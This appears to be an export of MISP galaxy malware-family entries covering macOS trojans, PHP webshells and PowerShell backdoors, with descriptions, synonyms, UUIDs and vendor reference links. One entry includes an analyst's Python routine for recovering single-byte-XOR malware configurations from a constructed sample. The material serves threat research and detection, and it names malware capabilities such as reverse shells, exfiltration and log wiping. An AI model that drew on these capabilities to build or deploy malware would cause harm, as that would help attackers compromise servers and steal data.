According to PCrisk, Shlayer is a trojan designed to distribute various adware and other unwanted applications and to promote fake search engines. It is typically disguised as an Adobe Flash Player installer or as a software cracking tool.
In most cases, users encounter this trojan when visiting dubious torrent websites that are full of intrusive advertisements and deceptive downloads.
Internal MISP references
UUID c3ee82df-a004-4c68-89bd-eb4bb2dfc803 which can be used as unique global reference for Shlayer in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.shlayer - webarchive
- https://securelist.com/shlayer-for-macos/95724/ - webarchive
- https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508 - webarchive
- https://www.cisecurity.org/insights/blog/top-10-malware-march-2022 - webarchive
- https://objective-see.com/blog/blog_0x64.html - webarchive
- https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities - webarchive
- https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/ - webarchive
- https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-345a - webarchive
- https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf - webarchive
- https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Silver Sparrow
According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run natively on Apple's M1 chips; so far it has been distributed without a payload.
Internal MISP references
UUID f6a7aeeb-fcc5-4d26-9eab-c0b6e2819a6c which can be used as unique global reference for Silver Sparrow in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SimpleTea (OS X)
SimpleTea is a RAT for macOS that is based on the same object-oriented project as SimpleTea for Linux (SimplexTea).
It also shares similarities with POOLRAT (also known as SIMPLESEA), such as the supported commands and the single-byte XOR encryption of its configuration. However, the command indices differ.
SimpleTea for macOS was uploaded to VirusTotal from Hong Kong and China in September 2023.
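Both the POOLRAT entry and the SimpleTea description above mention a single-byte XOR encrypted configuration. The recovery routine below, an added example that is not code from either malware family or from any vendor report, brute-forces all 256 keys with cribs an analyst expects in a C2 configuration, and cross-checks with the NUL-padding frequency shortcut. The sample blob is constructed for this example (the URL, the "sleep" field and the key 0x5A are assumptions), not a configuration extracted from a real sample.

```python
"""
Brute-force recovery of a single-byte-XOR-encrypted configuration blob.

Added example for the POOLRAT / SimpleTea entries; not code from either
family. The blob below is constructed; its contents and key are assumptions.
"""
from collections import Counter

# Tokens an analyst expects inside a C2 configuration; used as cribs. Cribs
# are kept at three bytes or longer so that a single coincidental byte cannot
# outscore a real hit.
DEFAULT_CRIBS = (b"http", b"://", b".com", b".onion")


def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte. The operation is its own inverse."""
    return bytes(b ^ key for b in data)


def printable_or_nul_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII, whitespace or NUL padding."""
    if not data:
        return 0.0
    ok = sum(1 for b in data if 0x20 <= b < 0x7F or b in (0x00, 0x09, 0x0A, 0x0D))
    return ok / len(data)


def most_common_byte_key(blob: bytes) -> int:
    """
    Frequency shortcut: configuration blobs are usually padded with NUL bytes,
    and NUL ^ key == key, so the most frequent ciphertext byte is a good guess.
    """
    return Counter(blob).most_common(1)[0][0]


def recover_single_byte_xor(blob: bytes, cribs=DEFAULT_CRIBS):
    """
    Try all 256 keys and return candidates ranked best-first as
    (crib_score, printable_ratio, key, plaintext).

    crib_score sums len(crib) * occurrences, so a four-byte hit such as "http"
    outweighs shorter matches. Candidates with no crib hit are dropped; if
    nothing matches, fall back to the frequency heuristic so the caller always
    gets one candidate to inspect.
    """
    ranked = []
    for key in range(256):
        pt = xor_single_byte(blob, key)
        score = sum(len(c) * pt.count(c) for c in cribs)
        if score:
            ranked.append((score, printable_or_nul_ratio(pt), key, pt))
    if not ranked:
        key = most_common_byte_key(blob)
        pt = xor_single_byte(blob, key)
        ranked.append((0, printable_or_nul_ratio(pt), key, pt))
    ranked.sort(key=lambda t: (-t[0], -t[1], t[2]))
    return ranked


# Constructed sample: a config-like buffer with NUL padding, XORed with 0x5A.
SAMPLE_KEY = 0x5A
SAMPLE_PLAINTEXT = b"c2=https://198.51.100.7/update\x00" + b"\x00" * 16 + b"sleep=300\x00"
SAMPLE_BLOB = xor_single_byte(SAMPLE_PLAINTEXT, SAMPLE_KEY)

if __name__ == "__main__":
    print("frequency guess: 0x%02X" % most_common_byte_key(SAMPLE_BLOB))
    for score, ratio, key, pt in recover_single_byte_xor(SAMPLE_BLOB)[:3]:
        print(f"key=0x{key:02X} cribs={score} printable={ratio:.2f} {pt!r}")
```

Against a real sample, the two methods should agree; when they do not, the blob is usually either not NUL-padded (so the frequency shortcut picks a wrong byte) or encrypted with something more than a single-byte XOR, which is the signal to go back to the decryption routine in the binary.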
Internal MISP references
UUID ce384804-8580-4d57-97b3-bde0d903f703 which can be used as unique global reference for SimpleTea (OS X) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.simpletea - webarchive
- https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-apt-activity-report-q2-2023-q3-2023.pdf - webarchive
- https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA%3D%3D&mid=2247499462&idx=1&sn=7cc55f3cc2740e8818648efbec21615f - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SpectralBlur (OS X)
Internal MISP references
UUID c7c32006-a2d1-4bc2-8a25-84c07286464a which can be used as unique global reference for SpectralBlur (OS X) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SUGARLOADER
Internal MISP references
UUID 171501fd-d504-4257-9c3d-fbc066d6eeba which can be used as unique global reference for SUGARLOADER in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.sugarloader - webarchive
- https://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/ - webarchive
- https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2024/papers/Sugarcoating-KANDYKORN-a-sweet-dive-into-a-sophisticated-MacOS-backdoor.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SysJoker (OS X)
Internal MISP references
UUID 5bffe0fe-22f6-4d18-9372-f8c5d262d852 which can be used as unique global reference for SysJoker (OS X) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.sysjoker - webarchive
- https://www.sentinelone.com/blog/sneaky-spies-and-backdoor-rats-sysjoker-and-dazzlespy-malware-target-macos/ - webarchive
- https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/ - webarchive
- https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html - webarchive
- https://www.bleepingcomputer.com/news/security/new-sysjoker-backdoor-targets-windows-macos-and-linux/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
systemd
General-purpose backdoor.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular systemd.
| Known Synonyms |
|---|
Demsty |
ReverseWindow |
Internal MISP references
UUID a8e7687b-9db7-4606-ba81-320d36099e3a which can be used as unique global reference for systemd in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Tsunami (OS X)
Internal MISP references
UUID 59d4a2f3-c66e-4576-80ab-e04a4b0a4317 which can be used as unique global reference for Tsunami (OS X) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified macOS 001 (UnionCryptoTrader)
Internal MISP references
UUID 1c96f6b9-6b78-4137-9d5f-aa5575f80daa which can be used as unique global reference for Unidentified macOS 001 (UnionCryptoTrader) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.unidentified_001 - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment - webarchive
- https://objective-see.com/blog/blog_0x51.html - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c - webarchive
- https://securelist.com/operation-applejeus-sequel/95596/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
UpdateAgent
Internal MISP references
UUID 1f1bc885-5987-41fa-bb04-8775eeb45d88 which can be used as unique global reference for UpdateAgent in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.update_agent - webarchive
- https://www.esentire.com/blog/updateagent-macos-malware - webarchive
- https://www.jamf.com/blog/updateagent-adapts-again/ - webarchive
- https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/ - webarchive
- https://twitter.com/sysopfb/status/1532442456343691273 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Uroburos (OS X)
Internal MISP references
UUID 13173d75-45f0-4183-8e18-554a5781405c which can be used as unique global reference for Uroburos (OS X) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Vigram
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Vigram.
| Known Synonyms |
|---|
WizardUpdate |
Internal MISP references
UUID 021e2fb4-1744-4fde-8d59-b247f1b34062 which can be used as unique global reference for Vigram in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.vigram - webarchive
- https://twitter.com/MsftSecIntel/status/1451279679059488773 - webarchive
- https://twitter.com/ConfiantIntel/status/1351559054565535745 - webarchive
- https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
WatchCat
Internal MISP references
UUID a73468d5-2dee-4828-8bbb-c37ea9295584 which can be used as unique global reference for WatchCat in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
WindTail
Internal MISP references
UUID 48751182-0b17-4326-8a72-41e4c4be35e7 which can be used as unique global reference for WindTail in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.windtail - webarchive
- https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/04/vb2019-paper-cyber-espionage-middle-east-unravelling-osxwindtail/ - webarchive
- https://objective-see.com/blog/blog_0x3D.html - webarchive
- https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56 - webarchive
- https://www.forbes.com/sites/thomasbrewster/2018/08/30/apple-mac-loophole-breached-in-middle-east-hacks/ - webarchive
- https://objective-see.com/blog/blog_0x3B.html - webarchive
- https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Winnti (OS X)
Internal MISP references
UUID 5aede44b-1a30-4062-bb97-ac9f4985ddb6 which can be used as unique global reference for Winnti (OS X) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
WireLurker (OS X)
Internal MISP references
UUID bc32df24-8e80-44bc-80b0-6a4d55661aa5 which can be used as unique global reference for WireLurker (OS X) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Wirenet (OS X)
Internal MISP references
UUID f99ef0dc-9e96-42e0-bbfe-3616b3786629 which can be used as unique global reference for Wirenet (OS X) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
X-Agent (OS X)
Internal MISP references
UUID 858f4396-8bc9-4df8-9370-490bbb3b4535 which can be used as unique global reference for X-Agent (OS X) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-twilight - webarchive
- https://twitter.com/PhysicalDrive0/status/845009226388918273 - webarchive
- https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf - webarchive
- http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
XCSSET
Internal MISP references
UUID 041aee7f-cb7a-4199-9fe5-494801a18273 which can be used as unique global reference for XCSSET in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset - webarchive
- https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/xcsset-mac-malware-infects-xcode-projects-performs-uxss-attack-on-safari-other-browsers-leverages-zero-day-exploits/ - webarchive
- https://objective-see.com/blog/blog_0x5F.html - webarchive
- https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/ - webarchive
- https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html - webarchive
- https://www.trendmicro.com/en_us/research/21/g/updated-xcsset-malware-targets-telegram--other-apps.html - webarchive
- https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities - webarchive
- https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Xloader
Xloader is a rebranding of the Formbook malware (mainly a stealer) and is available for macOS as well.
Formbook has a "magic"-value FBNG (FormBook-NG), while Xloader has a "magic"-value XLNG (XLoader-NG). This "magic"-value XLNG is platform-independent.
Not to be confused with apk.xloader or ios.xloader.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Xloader.
| Known Synonyms |
|---|
| Formbook |
Internal MISP references
UUID d5f2f6ad-2ed0-42d4-9116-f95eea2ab543 which can be used as unique global reference for Xloader in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.xloader - webarchive
- https://medium.com/@shaddy43/layers-of-deception-analyzing-the-complex-stages-of-xloader-4-3-malware-evolution-2dcb550b98d9 - webarchive
- https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya - webarchive
- https://twitter.com/krabsonsecurity/status/1319463908952969216 - webarchive
- https://www.sentinelone.com/blog/detecting-xloader-a-macos-malware-as-a-service-info-stealer-and-keylogger/ - webarchive
- https://www.sentinelone.com/blog/xloaders-latest-trick-new-macos-variant-disguised-as-signed-officenote-app/ - webarchive
- https://www.zscaler.com/blogs/security-research/technical-analysis-xloader-versions-6-and-7-part-2 - webarchive
- https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption - webarchive
- https://research.checkpoint.com/2022/xloader-botnet-find-me-if-you-can/ - webarchive
- https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer - webarchive
- https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/ - webarchive
- https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-xbinder-xloader/ - webarchive
- https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/ - webarchive
- https://blog.malwarebytes.com/mac/2021/07/osx-xloader-hides-little-except-its-main-purpose-what-we-learned-in-the-installation-process/ - webarchive
- https://sublime.security/blog/xloader-deep-dive-link-based-malware-delivery-via-sharepoint-impersonation/ - webarchive
- https://www.lac.co.jp/lacwatch/report/20220307_002893.html - webarchive
- https://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/ - webarchive
- https://www.zscaler.com/blogs/security-research/technical-analysis-xloader-versions-6-and-7-part-1 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
XSLCmd
Internal MISP references
UUID 120a5890-dc3e-42e8-950e-b5ff9a849d2a which can be used as unique global reference for XSLCmd in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Yort
Internal MISP references
UUID 725cd3eb-1025-4da3-bcb1-a7b6591c632b which can be used as unique global reference for Yort in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ZuRu
A malware that was observed being embedded alongside legitimate applications (such as iTerm2) offered for download on suspicious websites pushed in search engines. It uses a Python script to perform reconnaissance on the compromised system and pulls additional payload(s).
Internal MISP references
UUID bd293592-d2dd-4fdd-88e7-6098e0bbb043 which can be used as unique global reference for ZuRu in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Ani-Shell
Ani-Shell is a simple PHP shell with some unique features like Mass Mailer, a simple Web-Server Fuzzer, Dosser, Back Connect, Bind Shell, Auto Rooter etc.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ani-Shell.
| Known Synonyms |
|---|
| anishell |
Internal MISP references
UUID 7ef3c0fd-8736-47b1-8ced-ca7bf6d27471 which can be used as unique global reference for Ani-Shell in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ANTAK
Antak is a webshell written in ASP.Net which utilizes PowerShell.
Internal MISP references
UUID 88a71ca8-d99f-416a-ad29-5af12212008c which can be used as unique global reference for ANTAK in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/php.antak - webarchive
- https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx - webarchive
- http://www.labofapenetrationtester.com/2014/06/introducing-antak.html - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ASPXSpy
ASPXSpy is an open-source web shell written in C# that allows a threat actor to accomplish various post-exploitation tasks, including file access and command execution.
Internal MISP references
UUID 4d1c01be-76ad-42dd-b094-7a8dbaf02159 which can be used as unique global reference for ASPXSpy in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/php.aspxspy - webarchive
- https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/ - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- https://go.recordedfuture.com/hubfs/reports/mtp-2021-1214.pdf - webarchive
- https://asec.ahnlab.com/en/47455/ - webarchive
- https://www.recordedfuture.com/full-spectrum-detections-five-popular-web-shells - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Behinder
A webshell for multiple web languages (asp/aspx, jsp/jspx, php), openly distributed through Github.
Internal MISP references
UUID 5e5cd3a6-0348-4c6b-94b1-13ca0d845547 which can be used as unique global reference for Behinder in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/php.behinder - webarchive
- https://github.com/hktalent/MyDocs/blob/main/BehinderShell.md - webarchive
- https://harfanglab.io/insidethelab/insights-ivanti-csa-exploitation/ - webarchive
- https://www.elastic.co/security-labs/ref2924-howto-maintain-persistence-as-an-advanced-threat - webarchive
- https://blog.gigamon.com/2022/09/28/investigating-web-shells/ - webarchive
- https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
c99shell
C99shell is a PHP backdoor that provides a lot of functionality, for example:
- run shell commands;
- download/upload files from and to the server (FTP functionality);
- full access to all files on the hard disk;
- self-delete functionality.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular c99shell.
| Known Synonyms |
|---|
| c99 |
Internal MISP references
UUID cd1b8ec2-dbbd-4e73-b9a7-1bd1287a68f2 which can be used as unique global reference for c99shell in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DEWMODE
FireEye discovered the DEWMODE webshell starting mid-December 2020 after exploitation of zero-day vulnerabilities in Accellion's File Transfer Appliance. It is a PHP webshell that allows threat actors to view and download files in the victim machine. It also contains cleanup function to remove itself and clean the Apache log.
Internal MISP references
UUID a782aac8-168d-4691-a182-237d7d473e21 which can be used as unique global reference for DEWMODE in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode - webarchive
- https://go.recordedfuture.com/hubfs/reports/mtp-2021-0312.pdf - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a - webarchive
- https://www.accellion.com/sites/default/files/trust-center/accellion-fta-attack-mandiant-report-full.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DollyWay
PHP/JavaScript malware for WordPress that injects multi-stage scripts, turning compromised sites into distributed TDS/C2 nodes. Delivers signed payloads, maintains persistence via helper files, and redirects traffic to monetized scam networks.
Internal MISP references
UUID 13674aff-3746-4c5b-827f-ea2779874942 which can be used as unique global reference for DollyWay in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/php.dollyway - webarchive
- https://www.godaddy.com/resources/news/dollyway-malware-c2-tds - webarchive
- https://www.godaddy.com/resources/news/dollyway-world-domination - webarchive
- https://blogs.infoblox.com/threat-intelligence/vexing-and-vicious-the-eerie-relationship-between-wordpress-hackers-and-an-adtech-cabal/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Ensikology
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ensikology.
| Known Synonyms |
|---|
| Ensiko |
Internal MISP references
UUID dfd8deac-ce86-4a22-b462-041c19d62506 which can be used as unique global reference for Ensikology in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Glutton
According to Xlab, Glutton is a modular PHP fileless attack framework, capable of data exfiltration and running backdoors.
Internal MISP references
UUID 2e55f9ec-2fce-401b-81fe-e98692a97eb6 which can be used as unique global reference for Glutton in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
p0wnyshell
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular p0wnyshell.
| Known Synonyms |
|---|
| Ponyshell |
| Pownyshell |
Internal MISP references
UUID a6d13ffe-1b1a-46fe-afd9-989e8dec3773 which can be used as unique global reference for p0wnyshell in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Parrot TDS WebShell
In combination with Parrot TDS the usage of a classical web shell was observed by DECODED Avast.io.
Internal MISP references
UUID c9e7c5a6-9082-47ec-89eb-477980e73dcb which can be used as unique global reference for Parrot TDS WebShell in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/php.parrot_tds_shell - webarchive
- https://unit42.paloaltonetworks.com/parrot-tds-javascript-evolution-analysis/ - webarchive
- https://www.silentpush.com/blog/socgholish/ - webarchive
- https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PAS
Internal MISP references
UUID e6a40fa2-f79f-40e9-89d3-a56984bc51f7 which can be used as unique global reference for PAS in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/php.pas - webarchive
- https://blog.erratasec.com/2016/12/some-notes-on-iocs.html - webarchive
- https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm - webarchive
- https://securelist.com/apt-trends-report-q1-2021/101967/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf - webarchive
- https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Prometheus Backdoor
Backdoor written in PHP.
Internal MISP references
UUID b4007b02-106d-420f-af1c-76c035843fd2 which can be used as unique global reference for Prometheus Backdoor in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PS1Bot
According to Cisco Talos, this is a multi-stage malware framework, implemented in PowerShell and C#, that possesses robust functionality, including the ability to deliver follow-on modules including an information stealer, keylogger, screen capture collector and more. It also establishes persistence to continue operations following system reboots. The design of this malware framework appears to attempt to minimize artifacts left on infected systems by facilitating the delivery and execution of modules in-memory, without requiring them to be written to disk. Due to similarities in the design and implementation with the malware family AHK Bot, we are referring to this PowerShell-based malware as "PS1Bot."
Internal MISP references
UUID 188c4fae-bd59-4470-81b9-63dba44c7986 which can be used as unique global reference for PS1Bot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RedHat Hacker WebShell
Internal MISP references
UUID e94a5b44-f2c2-41dc-8abb-6de69eb38241 which can be used as unique global reference for RedHat Hacker WebShell in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
php.shin_webshell
A PHP webshell that allows file system management, data exfiltration and command execution.
Internal MISP references
UUID cbf8e4b6-2555-447d-a37e-ff407668b311 which can be used as unique global reference for php.shin_webshell in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
WSO
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WSO.
| Known Synonyms |
|---|
| Webshell by Orb |
Internal MISP references
UUID 7f3794fc-662e-4dde-b793-49bcaccc96f7 which can be used as unique global reference for WSO in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/php.wso - webarchive
- https://securelist.com/energetic-bear-crouching-yeti/85345/ - webarchive
- https://www.mandiant.com/resources/cloud-metadata-abuse-unc2903 - webarchive
- https://www.aquasec.com/blog/loony-tunables-vulnerability-exploited-by-kinsing/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Silence DDoS
Internal MISP references
UUID b5cc7a39-305b-487e-b15a-02dcebefce90 which can be used as unique global reference for Silence DDoS in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BlackSun
Ransomware.
Internal MISP references
UUID 1fcc4425-6e14-47e6-8434-745cf1bc9982 which can be used as unique global reference for BlackSun in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BONDUPDATER
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BONDUPDATER.
| Known Synonyms |
|---|
| Glimpse |
| Poison Frog |
Internal MISP references
UUID 99600ba5-30a0-4ac8-8583-6288760b77c3 which can be used as unique global reference for BONDUPDATER in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater - webarchive
- https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/ - webarchive
- https://marcoramilli.com/2019/05/02/apt34-glimpse-project/ - webarchive
- https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2 - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-gypsy - webarchive
- https://unit42.paloaltonetworks.com/behind-the-scenes-with-oilrig/ - webarchive
- https://blog.0day.rocks/hacking-back-and-influence-operations-85cd52c1e933 - webarchive
- https://ironnet.com/blog/chirp-of-the-poisonfrog/ - webarchive
- https://www.netscout.com/blog/asert/tunneling-under-sands - webarchive
- https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae - webarchive
- https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/ - webarchive
- https://nsfocusglobal.com/apt34-event-analysis-report/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CASHY200
Internal MISP references
UUID 7373c789-2dc2-4867-9c60-fa68f8d971a2 which can be used as unique global reference for CASHY200 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
COOKBOX
According to CERT-UA, COOKBOX is a PowerShell script that implements the functionality of downloading and executing PowerShell cmdlets. For each affected computer, a unique identifier is calculated using cryptographic transformations (SHA256/MD5 hash functions) based on a combination of computer name and disk serial number, which is transmitted in the “X-Cookie” header of HTTP requests when interacting with the management server. The persistence of the backdoor is ensured by the corresponding key in the Run branch of the operating system (OS) registry, which is created at the stage of the initial infection by a third-party PowerShell script (including the COOKBOX deployer). As a rule, obfuscation elements are used in the program code: chr-character encoding, character replacement (replace()), base64 conversion, GZIP compression.
Internal MISP references
UUID 63d51443-e4db-40b7-ba51-efc330c7a6ee which can be used as unique global reference for COOKBOX in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.cookbox - webarchive
